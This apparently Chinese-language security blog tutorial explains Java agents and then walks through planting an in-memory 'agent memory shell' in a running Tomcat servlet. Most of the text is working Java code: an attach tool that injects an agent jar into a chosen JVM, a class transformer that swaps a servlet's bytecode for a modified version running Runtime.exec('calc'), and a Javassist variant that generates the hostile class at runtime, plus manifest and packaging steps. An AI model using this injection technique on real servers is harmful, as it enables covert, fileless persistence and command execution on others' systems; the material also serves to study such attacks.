java agent使用与agent内存马
什么是java agent
本质是一个jar包中的类,有两种实现,第一种是通过permain()函数实现。这种javaagent会在宿主程序的main函数的启动前启动自己premain函数,这时候会得到一个Instrumentation对象,我们可以通过Instrumentation对象对还未加载的class进行拦截与修改。
还有一种实现方式是利用agentmain()函数。VirtualMachine类的attach(pid)方法可以将当前进程attach到一个运行中的java进程上,接着利用loadAgent(agentJarPath)来将含符合格式且含有agentmain函数的jar包注入到对应的进程,调用loadAgent函数后,对应的进程中会多出一个Instrumentation对象,这个对象会被当作agentmain的一个参数。对应进程接着会调用agentmain函数,进而操作Instrumentation对象,Instrumentation对象可以在class加载前拦截字节码进行修改,也可以对已经加载的class重新让它加载,并拦截且修改其中的内容,跟进程注入差不多,具体做什么操作,取决于我们的jar文件中的agentmain函数怎么写。
Java agent的使用方式有两种:
实现premain方法,在JVM启动前加载。
实现agentmain方法,在JVM启动后加载。
agent基础使用
环境搭建
agent项目源码
agent:
package com.naihe;
import java.io.IOException;
import java.lang.instrument.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.ProtectionDomain;
public class agent {
//java agent 入口
public static void premain(String agentOps, Instrumentation inst) {
System.out.println("=========premain方法执行========");
simpleDemo(agentOps, inst);
}
public static void agentmain(String agentOps, Instrumentation inst) {
System.out.println("=========agentmain方法执行========");
simpleDemo(agentOps, inst);
//transform是会对尚未加载的类进行增加代理层,这里是已经运行中的jvm,所以类以及被加载了
//必须主动调用retransformClasses让jvm再对运行中的类进行加上代理层
for (Class allLoadedClass : inst.getAllLoadedClasses()) {
//这里的Test路径,修改成你自己机器agent-demo-web工程的Test类的路径
if(allLoadedClass.getName().contains("com.naihe.Demo")){
try {
inst.retransformClasses(allLoadedClass);
} catch (UnmodifiableClassException e) {
e.printStackTrace();
}
}
}
}
public static void simpleDemo(String agentOps, Instrumentation inst) {
inst.addTransformer(new ClassFileTransformer() {
@Override
public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
//判断是指定的class
if ("com/naihe/Demo".equals(className)) {
try {
//获取更改后的类class 字节数组
String path="C:/Users/12107/Desktop/Demo2.class";
classfileBuffer = Files.readAllBytes(Paths.get(path));
} catch (IOException e) {
e.printStackTrace();
}
}
return classfileBuffer;
}
},true);
}
}
app项目源码
application:
package com.naihe;
public class application {
public static void main(String[] args) {
while(true){
new Demo().Test();
try {
Thread.sleep(500);
}catch (Exception e){}
}
}
}
Demo:
package com.naihe;
public class Demo {
public static void Test() {
System.out.println("正常运行中.....");
}
}
attach:
package com.naihe;
import com.sun.tools.attach.*;
import java.io.IOException;
import java.util.List;
import java.util.Scanner;
import java.util.stream.Collectors;
public class attach {
public static void main(String[] args) {
//查找所有jvm进程,排除attach测试工程
List<VirtualMachineDescriptor> attach = VirtualMachine.list()
.stream()
.filter(jvm -> {
return !jvm.displayName().contains("attach");
}).collect(Collectors.toList());
for (int i = 0; i < attach.size(); i++) {
System.out.println("[" + i + "] " + attach.get(i).displayName()+":"+attach.get(i).id());
}
System.out.println("请输入需要attach的pid编号");
Scanner scanner = new Scanner(System.in);
String s = scanner.nextLine();
VirtualMachineDescriptor virtualMachineDescriptor = attach.get(new Integer(s));
try {
VirtualMachine virtualMachine = VirtualMachine.attach(virtualMachineDescriptor.id());
virtualMachine.loadAgent("C:\\Users\\12107\\Desktop\\agent.jar", "param");
virtualMachine.detach();
} catch (AttachNotSupportedException e) {
System.out.println("AttachNotSupportedException:" + e.getMessage());
} catch (IOException e) {
System.out.println("IOException:" + e.getMessage());
} catch (AgentLoadException e) {
System.out.println("AgentLoadException:" + e.getMessage());
} catch (AgentInitializationException e) {
System.out.println("AgentInitializationException:" + e.getMessage());
}
}
}
retransformClasses:对于已经加载的类重新进行转换处理,即会触发重新加载类定义,需要注意的是,新加载的类不能修改旧有的类声明,譬如不能增加属性、不能修改方法声明
静态修改class
一,将agent打包成jar包
进入classes目录
jar cvf agent.jar com/
这边直接打包得com文件,因为这只是一个小Demo给大家演示一下,并没有使用字节码相关的库
二,修改MANIFEST.MF
使用解压工具打开MANIFEST.MF,并修改内容
Premain-Class: com.naihe.agent
Agent-Class: com.naihe.agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
三,加载agent.jar
运行app中的application
使用ideal加载jar
-javaagent:C:/Users/12107/Desktop/agent.jar
动态修改class
清除之前的内容
正常运行
运行attach
可以看到Demo的test方法已经被修改了
agent内存马
搭建一个简单的Servlet项目
ServletDemo
package com.naihe;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
public class ServletDemo extends HttpServlet {
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
resp.getWriter().write("123");
}
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
doGet(req, resp);
}
}
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="false"
>
<!--注册Servlet-->
<servlet>
<servlet-name>demo</servlet-name>
<servlet-class>com.naihe.ServletDemo</servlet-class>
</servlet>
<!--Servlet的请求路径-->
<servlet-mapping>
<servlet-name>demo</servlet-name>
<url-pattern>/demo</url-pattern>
</servlet-mapping>
</web-app>
agent
package com.naihe;
import java.io.IOException;
import java.lang.instrument.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.ProtectionDomain;
public class agent {
//java agent 入口
public static void premain(String agentOps, Instrumentation inst) {
System.out.println("=========premain方法执行========");
simpleDemo(agentOps, inst);
}
public static void agentmain(String agentOps, Instrumentation inst) {
System.out.println("=========agentmain方法执行========");
simpleDemo(agentOps, inst);
//transform是会对尚未加载的类进行增加代理层,这里是已经运行中的jvm,所以类以及被加载了
//必须主动调用retransformClasses让jvm再对运行中的类进行加上代理层
for (Class allLoadedClass : inst.getAllLoadedClasses()) {
//这里的Test路径,修改成你自己机器agent-demo-web工程的Test类的路径
if(allLoadedClass.getName().contains("com.naihe.ServletDemo")){
try {
inst.retransformClasses(allLoadedClass);
} catch (UnmodifiableClassException e) {
e.printStackTrace();
}
}
}
}
public static void simpleDemo(String agentOps, Instrumentation inst) {
inst.addTransformer(new ClassFileTransformer() {
@Override
public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
//判断是指定的class
if ("com/naihe/ServletDemo".equals(className)) {
try {
//获取更改后的类class 字节数组
String path="C:/Users/12107/Desktop/ServletDemo2.class";
classfileBuffer = Files.readAllBytes(Paths.get(path));
} catch (IOException e) {
e.printStackTrace();
}
}
return classfileBuffer;
}
},true);
}
}
ServletDemo2为ServletDemo被恶意修改后的文件
package com.naihe;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
public class ServletDemo extends HttpServlet {
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
Runtime.getRuntime().exec("calc");
resp.getWriter().write("success");
}
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
doGet(req, resp);
}
}
开启tomcat
运行attch:
以上的利用都是自己写好一个恶意类编译并上传使用,下面就是利用javaassist动态生成class后加载
利用Javaassist
package com.naihe;
import javassist.*;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.lang.instrument.*;
import java.lang.reflect.InvocationTargetException;
import java.security.ProtectionDomain;
public class agent {
//java agent 入口
public static void premain(String agentOps, Instrumentation inst) {
System.out.println("=========premain方法执行========");
simpleDemo(agentOps, inst);
}
public static void agentmain(String agentOps, Instrumentation inst) {
System.out.println("=========agentmain方法执行========");
simpleDemo(agentOps, inst);
//transform是会对尚未加载的类进行增加代理层,这里是已经运行中的jvm,所以类以及被加载了
//必须主动调用retransformClasses让jvm再对运行中的类进行加上代理层
for (Class allLoadedClass : inst.getAllLoadedClasses()) {
//这里的Test路径,修改成你自己机器agent-demo-web工程的Test类的路径
if(allLoadedClass.getName().contains("com.naihe.ServletDemo")){
try {
inst.retransformClasses(allLoadedClass);
} catch (UnmodifiableClassException e) {
e.printStackTrace();
}
}
}
}
public static void simpleDemo(String agentOps, Instrumentation inst) {
inst.addTransformer(new ClassFileTransformer() {
@Override
public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
//判断是指定的class
if ("com/naihe/ServletDemo".equals(className)) {
try {
classfileBuffer = JavaassistDemo();
} catch (IOException | CannotCompileException | NotFoundException | IllegalAccessException | InstantiationException | NoSuchMethodException | InvocationTargetException e) {
e.printStackTrace();
}
}
return classfileBuffer;
}
},true);
}
public static byte[] JavaassistDemo() throws CannotCompileException, IOException, NotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException, InvocationTargetException {
ClassPool pool = ClassPool.getDefault();
pool.importPackage("javax.servlet.http.HttpServlet");
pool.importPackage("java.io.IOException");
// 1. 创建一个空类
CtClass cc = pool.makeClass("com.naihe.ServletDemo");
// 2.添加父类
cc.setSuperclass(pool.get("javax.servlet.http.HttpServlet"));
// 3. 添加无参的构造函数
CtConstructor cons = new CtConstructor(new CtClass[]{}, cc);
cons.setBody("{}");
cc.addConstructor(cons);
// 4.创建doGet方法
CtMethod ctMethod = new CtMethod(CtClass.voidType, "doGet", new CtClass[]{pool.get("javax.servlet.http.HttpServletRequest"),pool.get("javax.servlet.http.HttpServletResponse")}, cc);
ctMethod.setModifiers(Modifier.PROTECTED);
ctMethod.setBody(" try {\n" +
" Runtime.getRuntime().exec(\"calc\");\n" +
" } catch (IOException var4) {\n" +
" var4.printStackTrace();\n" +
" }");
cc.addMethod(ctMethod);
// 4.创建doPost方法
CtMethod ctMethod2 = new CtMethod(CtClass.voidType, "doPost", new CtClass[]{pool.get("javax.servlet.http.HttpServletRequest"),pool.get("javax.servlet.http.HttpServletResponse")}, cc);
ctMethod2.setModifiers(Modifier.PROTECTED);
ctMethod2.setBody(" try {\n" +
" Runtime.getRuntime().exec(\"calc\");\n" +
" } catch (IOException var4) {\n" +
" var4.printStackTrace();\n" +
" }");
cc.addMethod(ctMethod2);
return cc.toBytecode();
}
}
由于利用了第三方jar包因此想要导出所有项目,不能再像前面那样只导出自己写的代码了,步骤如下
在这里我将使用javaassist的agent命名为agent2
打包好的jar就在如下位置
修改MANIFEST.MF 老样子在前面添加
Premain-Class: com.naihe.agent
Agent-Class: com.naihe.agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
访问demo
运行attach
加下方wx,拉你入群一起学习:
往期推荐